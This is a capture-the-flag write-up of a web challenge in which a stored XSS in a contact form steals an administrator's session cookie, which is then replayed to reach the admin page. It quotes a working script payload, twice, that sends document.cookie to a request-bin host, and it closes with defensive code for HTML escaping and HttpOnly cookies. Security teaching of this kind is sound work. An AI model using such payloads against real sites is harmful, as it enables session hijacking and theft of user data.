NDH qualifications’ write-up : Purple Posse Market challenge

CERT-DVT Writeups

Purple Posse Market was a web challenge where you had to steal the administrator’s personal information. It is an exercise in applying a cross-site scripting (XSS) attack.

Description:

You work for the government in the forensic department, you are investigating an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the website’s administrator.

URL: http://purplepossemarket.quals.nuitduhack.com/

Figure 1: Main page

This website looks like a simple store where you can order drugs, weapons and purple stuff!
There is also a Contact page where you can send an email to the administrator.

Figure 2: The administrator is currently online

The first thing you might think of for this contact page is cookie stealing.
So let’s try to inject some JavaScript code into the message viewed by the admin. When the admin opens the message containing the XSS, his browser will request our webpage with his cookie in the URL.


Figure 3: <script>document.write('<IMG SRC=\"http://requestb.in/xxxxxxxx?cookie='+document.cookie+'\">Hacked</IMG>');</script>

A few seconds later the administrator visits our requestb.in URL, which tells us that our XSS worked perfectly.
We now have the cookie “connect.sid”, which belongs to the administrator:

 s%3A7h5vTum7qxyriWA7ntDvn5i7g6UADEYg.eWcNTJgmIe5mzTeoENWbrLK%2BRpV%2B8Poukdg3e%2BwHjVk

Let’s use this cookie and try to access the admin web page with this HTTP header:

Finally we obtained this page:

Figure 4: http://purplepossemarket.quals.nuitduhack/admin

Which quite simply gives us the Flag: IBAN FR14 2004 1010 0505 0001 3M02 606
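
From the defender's side, both steps above are preventable: the contact message reached the admin's browser without output encoding, and “connect.sid” was readable through document.cookie, so it was not flagged HttpOnly. The following is an added example, not the challenge application's code; the function names are hypothetical and the sample inputs are constructed from the message shown in this write-up.

```javascript
// Added example: hypothetical helper names, not the challenge application's code.

// Constructed sample: the message body submitted through the Contact form,
// as shown in the write-up (request bin id elided as on the page).
const SAMPLE_MESSAGE =
  "<script>document.write('<IMG SRC=\"http://requestb.in/xxxxxxxx?cookie='" +
  "+document.cookie+'\">Hacked</IMG>');</script>";

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Mitigation 1: encode untrusted text before placing it in an HTML element body,
// so the admin's browser displays the markup as text instead of executing it.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderMessageForAdmin(message) {
  return '<div class="message">' + escapeHtml(message) + '</div>';
}

// Mitigation 2: issue the session cookie with HttpOnly so document.cookie
// cannot read it even if an injection slips through. Secure and SameSite
// restrict the connections and requests the cookie is attached to.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Audit helper: list the protective attributes a Set-Cookie value lacks.
function missingCookieFlags(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return ['httponly', 'secure', 'samesite'].filter(
    (flag) => !attrs.some((a) => a === flag || a.startsWith(flag + '='))
  );
}
```

Running missingCookieFlags over the Set-Cookie headers of an application is a quick check for session cookies that script can still read.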

Many thanks to Sysdream for having organized this event.